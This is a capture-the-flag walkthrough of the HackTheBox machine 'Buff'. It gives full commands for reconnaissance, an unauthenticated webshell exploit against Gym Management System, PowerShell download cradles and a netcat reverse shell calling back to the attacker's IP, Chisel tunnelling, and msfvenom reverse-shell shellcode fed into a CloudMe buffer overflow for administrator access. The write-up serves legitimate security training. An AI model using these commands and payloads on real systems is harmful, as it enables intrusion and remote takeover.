Buff

Windows :

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.198

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.198 

All 1000 scanned ports on 10.10.10.198 are in ignored states.
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.198

7680/tcp open  pando-pub?

8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests

Enumeration: HTTP Port 8080/tcp

Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

http://10.10.10.198:8080/

view-source:http://10.10.10.198:8080/

mrb3n's Bro Hut Made using Gym Management Software 1.0

http://10.10.10.198:8080/index.php

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.198:8080/

+ Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ /: Retrieved x-powered-by header: PHP/7.4.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
^[[B^[[B^[[B+ OpenSSL/1.1.1g appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.4.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.4.43 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 9660 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2024-01-14 23:17:54 (GMT-5) (4600 seconds)

GOBUSTER:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 200) [Size: 4969]
/home.php             (Status: 200) [Size: 143]
/img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/about.php            (Status: 200) [Size: 5337]
/contact.php          (Status: 200) [Size: 4169]
/register.php         (Status: 200) [Size: 137]
/profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/feedback.php         (Status: 200) [Size: 4252]
/Home.php             (Status: 200) [Size: 143]
/upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/upload.php           (Status: 200) [Size: 107]
/About.php            (Status: 200) [Size: 5337]
/Contact.php          (Status: 200) [Size: 4169]
/edit.php             (Status: 200) [Size: 4282]
/Index.php            (Status: 200) [Size: 4969]
/license              (Status: 200) [Size: 18025]
/up.php               (Status: 200) [Size: 209]
/packages.php         (Status: 200) [Size: 7791]
/examples             (Status: 503) [Size: 1058]
/include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/licenses             (Status: 403) [Size: 1203]
/facilities.php       (Status: 200) [Size: 5961]
/Register.php         (Status: 200) [Size: 137]
/Profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/Profile/]
/LICENSE              (Status: 200) [Size: 18025]
/Feedback.php         (Status: 200) [Size: 4252]
/att                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/att/]
/att.php              (Status: 200) [Size: 816]
/%20                  (Status: 403) [Size: 1044]
/IMG                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/IMG/]
/INDEX.php            (Status: 200) [Size: 4969]
/License              (Status: 200) [Size: 18025]
/ex                   (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/ex/]
/*checkout*           (Status: 403) [Size: 1044]
/*checkout*.php       (Status: 403) [Size: 1044]
/*checkout*.txt       (Status: 403) [Size: 1044]
/Img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/Img/]
/boot                 (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/boot/]
/Upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/Upload/]
/Upload.php           (Status: 200) [Size: 107]
/phpmyadmin           (Status: 403) [Size: 1203]
/HOME.php             (Status: 200) [Size: 143]
/webalizer            (Status: 403) [Size: 1044]
/*docroot*            (Status: 403) [Size: 1044]
/*docroot*.php        (Status: 403) [Size: 1044]
/*docroot*.txt        (Status: 403) [Size: 1044]
/*.txt                (Status: 403) [Size: 1044]
/*.php                (Status: 403) [Size: 1044]
/*                    (Status: 403) [Size: 1044]
/con.txt              (Status: 403) [Size: 1044]
/con                  (Status: 403) [Size: 1044]
/con.php              (Status: 403) [Size: 1044]
/Packages.php         (Status: 200) [Size: 7791]
/CONTACT.php          (Status: 200) [Size: 4169]
/Edit.php             (Status: 200) [Size: 4282]
/Facilities.php       (Status: 200) [Size: 5961]
/Include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/Include/]
/http%3A.php          (Status: 403) [Size: 1044]
/http%3A.txt          (Status: 403) [Size: 1044]
/http%3A              (Status: 403) [Size: 1044]
/**http%3a            (Status: 403) [Size: 1044]
/**http%3a.php        (Status: 403) [Size: 1044]
/**http%3a.txt        (Status: 403) [Size: 1044]
/*http%3A.php         (Status: 403) [Size: 1044]
/*http%3A             (Status: 403) [Size: 1044]
/*http%3A.txt         (Status: 403) [Size: 1044]
/UP.php               (Status: 200) [Size: 209]
/aux                  (Status: 403) [Size: 1044]
/aux.txt              (Status: 403) [Size: 1044]
/aux.php              (Status: 403) [Size: 1044]
/Boot                 (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/Boot/]
/ABOUT.php            (Status: 200) [Size: 5337]
/**http%3A.txt        (Status: 403) [Size: 1044]
/**http%3A.php        (Status: 403) [Size: 1044]
/**http%3A            (Status: 403) [Size: 1044]
/%C0.txt              (Status: 403) [Size: 1044]
/%C0.php              (Status: 403) [Size: 1044]
/%C0                  (Status: 403) [Size: 1044]
/Up.php               (Status: 200) [Size: 209]
/FeedBack.php         (Status: 200) [Size: 4252]
/server-status        (Status: 403) [Size: 1203]
/%3FRID%3D2671.txt    (Status: 403) [Size: 1044]
/%3FRID%3D2671        (Status: 403) [Size: 1044]
/%3FRID%3D2671.php    (Status: 403) [Size: 1044]
/devinmoore*.txt      (Status: 403) [Size: 1044]
/devinmoore*.php      (Status: 403) [Size: 1044]
/devinmoore*          (Status: 403) [Size: 1044]
/Ex                   (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/Ex/]

I actually went down a rabbit hole chasing through these things, but there’s a ton of pages. Eventually I realized that given the sheer number of pages, and given things like a license page, this is likely not a custom site for HTB, but some software package.

Gym Management System: When I first solved, I couldn’t find the name of the software displayed on the site (I was blind). There were two ways I could think of to find it without seeing it explicitly, and the third way below is the intended path (which is simply reading, but I’ll include the other two as potentially interesting):

  1. On all the pages, there’s a copyright and/or link to Projectworlds.in. Visiting that page lists tons of projects in PHP (and other languages), some free, others paid. At number 18 is Gym Management System, which fits the name of this box:

Logoprojectworlds | Free Projects and Free LearningsProjectworlds | All Type Software Project available Free or Paid

  1. Seeing that it’s some kind of framework, I could check for a README.md file at the web root, and it comes back: Gym Management System This the my gym management system it is made using PHP,CSS,HTML,Jquery,Twitter Bootstrap. All sql table info can be found in table.sql. more free projects click here - https://projectworlds.in YouTube Demo - https://youtu.be/J_7G_AahgSw

  2. On /contact.php, it clearly says the name of the framework:

Exploit: A quick search in searchsploit shows there’s an unauthenticated RCE vulnerability in the software:

┌──(kali💀kali)-[~]
└─$ searchsploit gym management

Gym Management System 1.0 - 'id' SQL Injection                 | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass              | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting        | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execut | php/webapps/48506.py

Shell as shaun

POC Shell: I’ll grab a copy of the exploit using searchploit -m php/webapps/48506.py (and I like to rename it something more descriptive, like gym_management_rce.py). I took a look at the script, and it looks like it bypasses filters to upload a webshell, and then runs an infinite loop getting commands from the user, submitting them to the webshell, parsing the results, and printing them.

It uses print "string" syntax, so it must be legacy Python. Still, the script works pretty well, at least to get a foothold:

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 48506.py
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48506.py
┌──(kali💀kali)-[~/Desktop]
└─$ python gym_management_rce.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,                                           
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.

C:\xampp\htdocs\gym\upload> whoami
 PNG
buff\shaun

C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt
 PNG
0a9e349b4--------------------------------

Priv: shaun –> administrator

nc64.exe: This shell gets a bit frustrating after a while, so I upgraded to nc64.exe. I started by running smbserver.py in the directory where I keep nc64.exe:

┌──(kali💀kali)-[~/Desktop/6. Web Shells]
└─$ python -m SimpleHTTPServer 5555
C:\xampp\htdocs\gym\upload> powershell -c iex(new-object net.webclient).downloadfile('http://10.10.16.4:5555/nc64.exe', 'C:\xampp\htdocs\gym\upload\nc64.exe')

C:\xampp\htdocs\gym\upload> dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7
 Directory of C:\xampp\htdocs\gym\upload
15/01/2024  04:10    <DIR>          .
15/01/2024  04:10    <DIR>          ..
15/01/2024  03:38                53 kamehameha.php
15/01/2024  04:10            45,272 nc64.exe
               2 File(s)         45,325 bytes
               2 Dir(s)   8,256,421,888 bytes free
               
C:\xampp\htdocs\gym\upload> nc64.exe 10.10.16.4 5555 -e cmd.exe
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.198] 50443

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
C:\xampp\htdocs\gym\upload> whoami /priv
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\xampp\htdocs\gym\upload> systeminfo
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          15/01/2024, 02:06:48
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,345 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,375 MB
Virtual Memory: In Use:    2,424 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::41e5:7a92:6887:70f1
                                 [03]: dead:beef::5115:dce9:e2:32e8
                                 [04]: dead:beef::41e5:7a92:6887:70f1
                                 [05]: dead:beef::c5
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Netstat:

Checking the netstat shows two ports listening only on localhost. 3306 is MySQL, which makes sense for the PHP site and XAmpp stack. The other is 8888:

C:\Users\shaun\Downloads> netstat -ano | findstr TCP | findstr ":0"
netstat -ano | findstr TCP | findstr ":0"
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6244
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7256
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7572
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       516
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1040
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1492
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2188
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       660
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       672
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       1480
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2840
  TCP    [::]:135               [::]:0                 LISTENING       932
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       7256
  TCP    [::]:8080              [::]:0                 LISTENING       7572
  TCP    [::]:49664             [::]:0                 LISTENING       516
  TCP    [::]:49665             [::]:0                 LISTENING       1040
  TCP    [::]:49666             [::]:0                 LISTENING       1492
  TCP    [::]:49667             [::]:0                 LISTENING       2188
  TCP    [::]:49668             [::]:0                 LISTENING       660
  TCP    [::]:49669             [::]:0                 LISTENING       672

I’ll grab the process ID (2820) and grep (or findstr) for i in the tasklist (the listening process id changes every minute so I’ll have to search quickly):

C:\Users\shaun\Downloads>tasklist /v | findstr 2840

If I dig a bit more in shaun’s home directory, there’s an exe in the Downloads folder:

C:\Users\shaun\Downloads>dir
 Directory of C:\Users\shaun\Downloads
14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe

Searchsploit:

I’ll throw cloudme into searchsploit and it returns several vulnerabilities:

┌──(kali💀kali)-[~]
└─$ searchsploit cloudme

CloudMe 1.11.2 - Buffer Overflow (PoC)                         | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)               | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)        | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                    | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)       | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                        | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)     | windows_x86-64/remote/44784.py// Some code

The version number for the top two (1.11.2) lines up nicely with the EXE name from Buff (CloudMe_1112.exe).

Tunnel:

It also looks like the version number is being listed as well. Turning to ExploitDB to see if I can find any public exploits, I quickly find this one: https://www.exploit-db.com/exploits/48389. This is a Python script, which should be pretty straightforward to execute.

LogoCloudMe 1.11.2 - Buffer Overflow (PoC)Exploit Database

But there is one small hurdle we’ll have to get through first. Because this is exploit is written in Python, and Python is not normally installed on Windows machines, we’ll need to use a tool like Chisel to tunnel from my attacking machine to the target.

So, lets get the exploit cleaned up and ready to execute and then transfer over Chisel to set up a tunnel.

Shell: Chisel

LogoGitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

Chisel is my favorite tool for situations like this, because it can be used on both Windows and Linux machines, doesn’t require SSH access, and is incredibly straight forward

First things first I need to copy Chisel over to the Buff machine. To do this I’ll use the same PowerShell one-liner I used to transfer over netcat:

First we have to google chisel binary and download one for linux and one for windows and unzip both of them using the command gunzip and also give both of them executable permission using chmod +x

LogoReleases · jpillora/chiselGitHub
┌──(kali💀kali)-[~/Desktop]
└─$ gunzip chisel_1.9.0_linux_amd64.gz
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ gunzip chisel_1.9.0_windows_amd64.gz

                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ chmod +x chisel_1.9.0_linux_amd64
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ chmod +x chisel_1.9.0_windows_amd64

Now keep the linux version of chisel in your kali and transfer the windows version to the target as chisel.exe.

┌──(kali💀kali)-[~/go/bin]
└─$ python -m SimpleHTTPServer 5555
powershell -c iwr http://10.10.16.4:5555/chisel_1.9.0_windows_amd64 -outfile chisel.exe

PORT FORWARDNG USING CHISEL:

Now I’ll run the Linux binary on Kali in server mode:

┌──(kali💀kali)-[~/Desktop]
└─$ ./chisel_1.9.0_linux_amd64 server -p 8000 --reverse
2024/01/15 02:36:00 server: Reverse tunnelling enabled
2024/01/15 02:36:00 server: Fingerprint ZdV6tKlWiB6RWaNi3jhlpMTt8mgew8BuN1fNu4LtyCA=
2024/01/15 02:36:00 server: Listening on http://0.0.0.0:8000

Next, from Buff, I’ll run as a client:

PS C:\Users\shaun\Downloads> ./chisel.exe client 10.10.16.4:8000 R:8888:localhost:8888

I can see my local box is listening on 8888:

┌──(kali💀kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8888                 :::*                    LISTEN      153024/./chisel_1.9 
tcp6       0      0 :::8000                 :::*                    LISTEN      153024/./chisel_1.9

Modifying The Exploit

This is a pretty straight forward buffer overflow exploit which will only need light updating. Looking at the code it looks like the shellcode provided opens up calc.exe, but we want something a bit more useful than that. So what we need to do is utilize msfvenom to create some new shell code that contains a reverse shell back to our box. We can do that as follows:

The payload in the script by default looks to be the output of msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python. Given the four-byte addresses and references to ESP and EIP (as opposed to RSP and RIP), this is a 32-bit program.

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=2560 -b '\x00\x0A\x0D' -f python -v payload

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload =  b""
payload += b"\xdb\xc2\xbd\x3c\x18\x85\x99\xd9\x74\x24\xf4"
payload += b"\x58\x29\xc9\xb1\x52\x31\x68\x17\x83\xc0\x04"
payload += b"\x03\x54\x0b\x67\x6c\x58\xc3\xe5\x8f\xa0\x14"
payload += b"\x8a\x06\x45\x25\x8a\x7d\x0e\x16\x3a\xf5\x42"
payload += b"\x9b\xb1\x5b\x76\x28\xb7\x73\x79\x99\x72\xa2"
payload += b"\xb4\x1a\x2e\x96\xd7\x98\x2d\xcb\x37\xa0\xfd"
payload += b"\x1e\x36\xe5\xe0\xd3\x6a\xbe\x6f\x41\x9a\xcb"
payload += b"\x3a\x5a\x11\x87\xab\xda\xc6\x50\xcd\xcb\x59"
payload += b"\xea\x94\xcb\x58\x3f\xad\x45\x42\x5c\x88\x1c"
payload += b"\xf9\x96\x66\x9f\x2b\xe7\x87\x0c\x12\xc7\x75"
payload += b"\x4c\x53\xe0\x65\x3b\xad\x12\x1b\x3c\x6a\x68"
payload += b"\xc7\xc9\x68\xca\x8c\x6a\x54\xea\x41\xec\x1f"
payload += b"\xe0\x2e\x7a\x47\xe5\xb1\xaf\xfc\x11\x39\x4e"
payload += b"\xd2\x93\x79\x75\xf6\xf8\xda\x14\xaf\xa4\x8d"
payload += b"\x29\xaf\x06\x71\x8c\xa4\xab\x66\xbd\xe7\xa3"
payload += b"\x4b\x8c\x17\x34\xc4\x87\x64\x06\x4b\x3c\xe2"
payload += b"\x2a\x04\x9a\xf5\x4d\x3f\x5a\x69\xb0\xc0\x9b"
payload += b"\xa0\x77\x94\xcb\xda\x5e\x95\x87\x1a\x5e\x40"
payload += b"\x07\x4a\xf0\x3b\xe8\x3a\xb0\xeb\x80\x50\x3f"
payload += b"\xd3\xb1\x5b\x95\x7c\x5b\xa6\x7e\x89\x96\xb8"
payload += b"\x7a\xe5\xa4\xb8\x88\xf5\x21\x5e\xe6\xe5\x67"
payload += b"\xc9\x9f\x9c\x2d\x81\x3e\x60\xf8\xec\x01\xea"
payload += b"\x0f\x11\xcf\x1b\x65\x01\xb8\xeb\x30\x7b\x6f"
payload += b"\xf3\xee\x13\xf3\x66\x75\xe3\x7a\x9b\x22\xb4"
payload += b"\x2b\x6d\x3b\x50\xc6\xd4\x95\x46\x1b\x80\xde"
payload += b"\xc2\xc0\x71\xe0\xcb\x85\xce\xc6\xdb\x53\xce"
payload += b"\x42\x8f\x0b\x99\x1c\x79\xea\x73\xef\xd3\xa4"
payload += b"\x28\xb9\xb3\x31\x03\x7a\xc5\x3d\x4e\x0c\x29"
payload += b"\x8f\x27\x49\x56\x20\xa0\x5d\x2f\x5c\x50\xa1"
payload += b"\xfa\xe4\x60\xe8\xa6\x4d\xe9\xb5\x33\xcc\x74"
payload += b"\x46\xee\x13\x81\xc5\x1a\xec\x76\xd5\x6f\xe9"
payload += b"\x33\x51\x9c\x83\x2c\x34\xa2\x30\x4c\x1d"

I changed the payload type (and included LHOST and LPORT needed for this payload), and I used the -v payload to set the output payload variable name so I can just paste it into the script.

With: -a for the architecture -p for the payload -b for the bad-characters (we didn't need to fuzz these ourselves, just use what's in the exploit) -f for the format -v for the variable

After updating the shellcode in the exploit, that should be it for updating the script.

Shell:

Now I just run the exploit through the tunnel with nc waiting (work with either legacy Python or Python3):

┌──(kali💀kali)-[~/Desktop]
└─$ sudo python ./48389.py   
┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 2560
listening on [any] 2560 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.198] 50456
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
df96a65b------------------------------
PreviousServMonNextToolbox

Last updated